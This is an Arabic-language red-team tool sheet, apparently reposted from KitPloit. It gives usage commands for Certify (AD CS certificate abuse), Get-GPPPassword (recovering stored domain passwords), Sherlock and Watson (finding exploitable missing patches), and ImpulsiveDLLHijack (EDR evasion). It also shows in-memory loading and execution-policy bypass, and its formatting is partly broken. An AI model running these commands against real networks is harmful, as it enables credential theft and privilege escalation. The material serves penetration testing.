Certify هي أداة بلغة C# لتعداد واستغلال التكوينات الخاطئة في Active Directory Certificate Services (AD CS).

تم تصميم Certify لاستخدامها بالتزامن مع أدوات وتقنيات الفريق الأحمر الأخرى، مثل Mimikatz وPowerShell، لتمكين أعضاء الفريق الأحمر من تنفيذ أنواع مختلفة من الهجمات، بما في ذلك هجمات الوسيط (man-in-the-middle)، وهجمات انتحال الشخصية، وهجمات تصعيد الصلاحيات.

**الميزات الرئيسية لـ Certify:**

- إنشاء الشهادات
- توقيع الشهادات
- استيراد الشهادات
- تعديل الثقة في الشهادات

**التثبيت: (تجميع)** 

Certify متوافق مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح مشروع Certify [.sln](https://github.com/GhostPack/Certify)، اختر "Release"، وقم بالبناء.

**التثبيت: (تشغيل Certify عبر PowerShell)** 

إذا كنت ترغب في تشغيل Certify في الذاكرة من خلال غلاف PowerShell، قم أولاً بتجميع Certify ثم قم بتشفير التجميع الناتج باستخدام base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

يمكن بعد ذلك تحميل Certify في سكريبت PowerShell باستخدام ما يلي (حيث يتم استبدال "aa..." بسلسلة التجميع المشفرة base64 الخاصة بـ Certify):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
يمكن بعد ذلك استدعاء طريقة Main() وأي وسائط على النحو التالي:```
[Certify.Program]::Main("find /vulnerable".Split())

يمكن العثور على تعليمات التجميع الكاملة هنا.

الاستخدام:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).

![image](https://assets.kitploit.com/production/public/readmes/147/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword هو نص PowerShell جزء من مجموعة أدوات PowerSploit، وهو مصمم لاسترجاع كلمات المرور للحسابات المحلية التي يتم إنشاؤها وإدارتها باستخدام Group Policy Preferences (GPP).

يعمل Get-GPPPassword عن طريق البحث في مجلد SYSVOL على وحدة تحكم المجال عن أي ملفات GPP تحتوي على معلومات كلمة المرور. بمجرد العثور على هذه الملفات، يقوم بفك تشفير معلومات كلمة المرور وعرضها للمستخدم.

**تثبيت:**

اتبع تعليمات تثبيت PowerSploit [هنا](https://github.com/A-poc/RedTeam-Tools#powersploit) من ورقة الأدوات هذه.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

الاستخدام:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![صورة](https://assets.kitploit.com/production/public/readmes/147/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

سكريبت PowerShell للعثور السريع على التصحيحات البرمجية المفقودة لثغرات رفع الامتيازات المحلية.

*يدعم:*

- MS10-015 : وضع المستخدم إلى الحلقة (KiTrap0D)
- MS10-092 : جدولة المهام
- MS13-053 : تجاوز سعة كومة نواة Win32k في NTUserMessageCall
- MS13-081 : صفحة NULL Win32k في TrackPopupMenuEx
- MS14-058 : إلغاء مرجع مؤشر فارغ في Win32k TrackPopupMenu
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : تجاوز سعة مخزن مؤقت لبرنامج تشغيل الخطوط
- MS16-016 : WebDAV في 'mrxdav.sys'
- MS16-032 : مقبض تسجيل الدخول الثانوي
- MS16-034 : رفع الامتيازات في برامج تشغيل وضع نواة Windows
- MS16-135 : رفع امتياز Win32k
- CVE-2017-7199 : رفع الامتيازات في Nessus Agent الإصدار 6.6.2 - 6.10.3

**التثبيت: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

الاستخدام: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

*الصورة مأخوذة من https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*

### [🔙](#tool-list)[واتسون](https://github.com/rasta-mouse/Watson)

واتسون هي أداة .NET مصممة لتعداد تصحيحات KB المفقودة واقتراح استغلالات لثغرات تصعيد الامتيازات.

ممتازة لتحديد التصحيحات المفقودة واقتراح الاستغلالات التي يمكن استخدامها لاستغلال الثغرات المعروفة من أجل الحصول على صلاحيات أعلى على النظام.

**التثبيت:**

باستخدام [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح [مشروع واتسون .sln](https://github.com/rasta-mouse/Watson)، اختر "Release"، وقم بالبناء.

**الاستخدام:**```bash
# Run all checks
Watson.exe

image

نص الصورة مأخوذ من https://github.com/rasta-mouse/Watson#usage

🔙ImpulsiveDLLHijack

أداة مبنية بلغة C# تعمل على أتمتة عملية اكتشاف واستغلال اختطاف DLL في الثنائيات المستهدفة.

يمكن تسليح المسارات المخترقة التي تم اكتشافها أثناء الاختراق لتجاوز أنظمة كشف التهديدات (EDR).

التثبيت:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • DLL التأكيدية المخصصة:
    • هذه هي ملفات DLL التي تساعد الأداة في الحصول على تأكيد ما إذا تم تحميل DLL بنجاح من مسار الاختطاف المحدد.
    • تم تجميعها من مشروع MalDLL المذكور أعلاه (أو استخدم الملفات الثنائية المجمعة مسبقًا إذا كنت تثق بي!).
    • يجب أن يكون اسم DLL لـ 32 بت: maldll32.dll
    • يجب أن يكون اسم DLL لـ 64 بت: maldll64.dll
    • تثبيت حزمة NuGet: PeNet -> https://www.nuget.org/packages/PeNet/ (شرط أساسي أثناء تجميع مشروع ImpulsiveDLLHijack)

ملاحظة: يجب وضع المتطلبات i و ii في نفس دليل ملف ImpulsiveDLLHijacks.exe.

  • معلومات البناء والإعداد:

    • ImpulsiveDLLHijack

      • استنساخ المستودع في Visual Studio
      • بعد تحميل المشروع في Visual Studio انتقل إلى "Project" ← "Manage NuGet packages" ← ابحث عن الحزم وقم بتثبيت "PeNet" → https://www.nuget.org/packages/PeNet/
      • قم ببناء المشروع!
      • سيكون ImpulsiveDLLHijack.exe داخل مجلد bin.
    • أما بالنسبة لـ DLL التأكيدية:

      • استنساخ المستودع في Visual Studio
      • قم ببناء المشروع بإصدار x86 و x64
      • أعد تسمية إصدار x86 باسم maldll32.dll وإصدار x64 باسم maldll64.dll

Read more

تنزيل الأداة
  • Gitrob ماسح المعلومات الحساسة على GitHub
  • gowitness أداة التقاط شاشات ويب باستخدام Chrome Headless